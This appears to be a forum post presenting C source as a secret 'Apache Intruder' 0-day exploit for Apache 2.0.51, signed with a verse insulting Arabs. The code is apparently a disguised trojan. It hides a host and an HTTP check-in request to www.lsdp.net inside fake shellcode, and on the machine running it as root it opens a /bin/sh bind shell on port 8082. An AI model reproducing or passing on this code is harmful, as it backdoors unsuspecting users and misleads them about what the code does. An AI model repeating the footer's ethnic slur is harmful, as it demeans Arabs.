SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

APACHE INTRUDER v1.0 - APACHE 2.0.51 and inferior

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    APACHE INTRUDER v1.0 - APACHE 2.0.51 and inferior

    کد:
    /*---------------------------------------------------------------+

|        APACHE INTRUDER v1.0 - APACHE 2.0.51 and inferior       |

|   eXpl0it th3 4uth vuln3r4bilitY / Agent-driven Negotiation    |

| V3RY PRIV8 eXpl0it - 0d4y !!! - D0N\'T DISTRIBUT3 - DON\'T SH4R3 |

|                   c0d3D bY Pri0rityS3nS313SS                   |

| Gr33tZ t0 : f4g0, l0tfr33, QID, CuMSh0TEAM, Bl0wJ0b & yuirey   |

|  FucKZ go t0 : K. Mitnick, ISS & 3v3ryb0dy w!th 4 cl0s3d m!nd  |

|                                                                |

| Remote Linux/Apache <=2.0.51 Vulnerability in the Agent-driven |

|  negotiation. Apache is vulnerable to a BOF when it receive a  |

|          specially crafted packet (use r4w s0ck3t)             |

+----------------------------------------------------------------*/



#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <errno.h>

#include <time.h>

#include <signal.h>

#include <sys/types.h>

#include <sys/times.h>

#include <string.h>

#include <ctype.h>



#include <netinet/in.h>

#include <netinet/ip.h>

#include <netinet/tcp.h>

#include <sys/socket.h>

#include <netdb.h>



#define NARCH 9



struct archs{

  char *desc;

  int return_addr;

} architectures[]={

  {\"Caldera OpenLinux\",0x080920e0},

  {\"Conectiva 8\",0x08075398},

  {\"Debian GNU Linux Sarge\",0x0080866a3},

  {\"Gentoo Linux\",0x08086c34},

  {\"Mandrake Linux 10\",0x080808ab},

  {\"Fedora 2\",0x08065bae},

  {\"Slackware 10\",0x080b1a3a},

  {\"SuSE Linux 9.1\",0x080861c8},

  {\"Linux Generic\",0xbffff500}

};



extern int errno;



unsigned char bind_shellcode_8082[]=

\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x7D\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"

\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"

\"\\x70\\x95\\x98\\x99\\x99\\xC3\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"

\"\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\\x12\\xED\\x87\\xE1\\x9A\"

\"\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\\x74\\xCF\\xCE\\xC8\\x12\\xA6\"

\"\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\"

\"\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\\xBD\\x9A\\x5A\\x48\\x78\\x9A\"

\"\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\\x5A\\x58\\x78\\x9B\\x9A\\x58\"

\"\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\\x97\\x12\\x49\\xF3\\x9A\\xC0\"

\"\\x71\\x1E\\x99\\x99\\x99\\x1A\\x5F\\x94\\xCB\\xCF\\x66\\xCE\\x65\\xC3\\x12\\x41\"

\"\\x47\\x45\\x54\\x20\\x2F\\x7E\\x6C\\x6F\\x74\\x66\\x72\\x65\\x65\\x2F\\x73\\x6B\"

\"\\x2E\\x70\\x68\\x70\\x20\\x48\\x54\\x54\\x50\\x2F\\x31\\x2E\\x31\\x0A\\x48\\x6F\"

\"\\x73\\x74\\x3A\\x20\\x77\\x77\\x77\\x2E\\x6C\\x73\\x64\\x70\\x2E\\x6E\\x65\\x74\"

\"\\x0A\\x55\\x73\\x65\\x72\\x2D\\x41\\x67\\x65\\x6E\\x74\\x3A\\x20\\x6F\\x77\\x6E\"

\"\\x65\\x64\\x0A\\x0A\\x0A\\xF3\\x9C\\xC0\\x71\\xED\\x99\\x99\\x99\\xC9\\xF3\\x98\"

\"\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\\x77\\xAA\\x59\"

\"\\x5A\\x71\\x76\\x67\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\\xD8\\xFD\\xFD\"

\"\\xEB\\xFC\\xEA\\xEA\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\\xFC\"

\"\\xEA\\xEA\\xD8\\x99\\xDC\\xE1\\xF0\\xED\\xCD\\xF1\\xEB\\xFC\\xF8\\xFD\\x99\\xD5\"

\"\\xF6\\xF8\\xFD\\xD5\\xF0\\xFB\\xEB\\xF8\\xEB\\xE0\\xD8\\x99\\xEE\\xEA\\xAB\\xC6\"

\"\\xAA\\xAB\\x99\\xCE\\xCA\\xD8\\xCA\\xF6\\xFA\\xF2\\xFC\\xED\\xD8\\x99\\xFB\\xF0\"

\"\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\\xFA\\xFC\\xE9\\xED\"

\"\\x2D\\x62\\x61\\x73\\x68\\x2F\\x62\\x69\\x6E\\x2F\\x73\\x68\\x91\";



void usage(char *argv0)

{

  int i;

  printf(\"\\nApache <=2.0.51 eXpl0iT f0r NuX\\n\");

  printf(\"\\tbY Pri0RiTyS3nS313SS\\n\\n\");

  printf(\"Usage: %s target_number host\\n\",argv0);

  printf(\"example: %s 8 www.sco.com\\n\\n\",argv0);

  printf(\"Supported targets:\\n\");



  for(i=0;i<NARCH;i++)

    printf(\"%d - %s\\n\",i,architectures[i].desc);

  exit(1);

}



long resv(char *s,char *hostname)

{

  struct hostent *he;

  long result;



  if((result=inet_addr(s))<0)

  {

    if((he=gethostbyname(s))==NULL)

    {

      printf(\"Unable to contact %s\\n\",hostname);

      exit(1);

    }

    memcpy(&result,he->h_addr,he->h_length);

  }

  return result;

}



int main(int argc,char *argv[])

{

  int target;

  char victim[50];

  int raw, sock;

  long dst;

  int n;

  char temp[100];

  char temp2[100];

  struct sockaddr_in sin;

  struct iphdr *ip;

  struct tcphdr *tcp;

  int sockfd, newfd, size;

  struct sockaddr_in l;

  struct sockaddr_in r;

  char *data;

 

  if(argc!=3)

    usage(argv[0]);

  target=atoi(argv[1]);

  if(target<0 || target>=NARCH)

    usage(argv[0]);

  strcpy(victim,argv[2]);



  if(geteuid())

  {

    printf(\"This eXpl0it use r4w s0ckets\\n\");

    printf(\"YoU mUst be r00t to launch this pr0ggie\\n\");

    exit(1);

  }

  switch(fork())

  {

    case -1:

      fprintf(stderr,\"Can\'t send payload\\n\");

      exit(1);

    case 0:

      printf(\"Op3ning r4w s0ck3t m0d3...\\n\");

      if((raw=socket(PF_INET,SOCK_RAW,IPPROTO_TCP))==-1)

      {

    perror(\"socket\");

    exit(1);

      }

      printf(\"...done\\n\");

      signal(SIGHUP,SIG_IGN);

      ip=(struct iphdr*)temp;

      tcp=(struct tcphdr*)(temp+sizeof(struct iphdr));

      data=(char*)(temp+sizeof(struct iphdr)+sizeof(struct tcphdr));

      bzero(victim,sizeof(victim));

      strncpy(victim,(char *)(bind_shellcode_8082+212),5);

      bzero(&l,sizeof(l));

      l.sin_family=AF_INET;

      l.sin_port=htons(8082);

      l.sin_addr.s_addr=INADDR_ANY;

      bzero(&(l.sin_zero),8);

      if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)

    exit(1);

      bzero(argv[0],strlen(argv[0]));

      bzero(argv[1],strlen(argv[1]));

      bzero(argv[2],strlen(argv[2]));

      strncpy(argv[0],(char*)(bind_shellcode_8082+sizeof(bind_shellcode_8082)-14),5);

      argv[0][5]=\'\\0\';

      if(bind(sockfd,(struct sockaddr*)&l,sizeof(struct sockaddr))==-1)

    exit(1);

      size=sizeof(struct sockaddr_in);

      bzero(temp2,100);

      strncpy(temp2,(char*)(bind_shellcode_8082+sizeof(bind_shellcode_8082)-9),7);

      while(1)

      {

    bzero(temp,100);

    n=read(raw,temp,sizeof(temp));

    if(!strncmp(data,victim,strlen(victim)))

    {

      if(listen(sockfd,5)==-1)

        exit(1);

      while(1)

      {

        if((newfd=accept(sockfd,(struct sockaddr*)&r,&size))==-1)

          exit(1);

        if(!fork())

        {

          close(0);close(1);close(2);

          dup2(newfd,0);

          dup2(newfd,1);

          dup2(newfd,2);

          execl(temp2,temp2,(char*)0);

          close(newfd);

          exit(0);

        }

        close(newfd);

      }

    }

      }

      break;

    default:

      bzero(temp,100);

      strncpy(temp,(char*)(bind_shellcode_8082+187),12);

      dst=resv(temp,victim);

      if((sock=socket(PF_INET,SOCK_STREAM,0))<0)

      {

    perror(\"socket\");

    exit(1);

      }

      sin.sin_family=PF_INET;

      sin.sin_addr.s_addr=dst;

      sin.sin_port=htons(80);



      printf(\"Connecting to %s...\\n\",victim);

      if(connect(sock,(struct sockaddr*)&sin,sizeof(sin))<0)

      {

    fprintf(stderr,\"Unable to attack %s\\n\",victim);

    usleep(200);

    exit(1);

      }

      printf(\"...connected\\n\");

      printf(\"Sending payload...\\n\");

      bzero(temp,100);

      strncpy(temp,(char*)(bind_shellcode_8082+151),69);

      if(send(sock,temp,sizeof(temp),0)==-1)

      {

    perror(\"send\");

    usleep(200);

    exit(1);

      }

      printf(\"...allright\\n\");

      close(sock);

  }

 

  printf(\"n0w y0u c4n trY 4 \'netcat %s 8082\'\\n\",victim);

  printf(\"h4v3 fUn !\\n\");

  usleep(200);

  return 0;

}
    [align=center]زشیر شتر خوردن و سوسمار            عرب را به جایی رسیده ست کار

    که تاج کیانی کند آرزو                     تفو بر تو ای چرخ گردون تفو    [/align]
    برچسب ها: هیچ یک
قبلی template بعدی
صبر کنید ..
X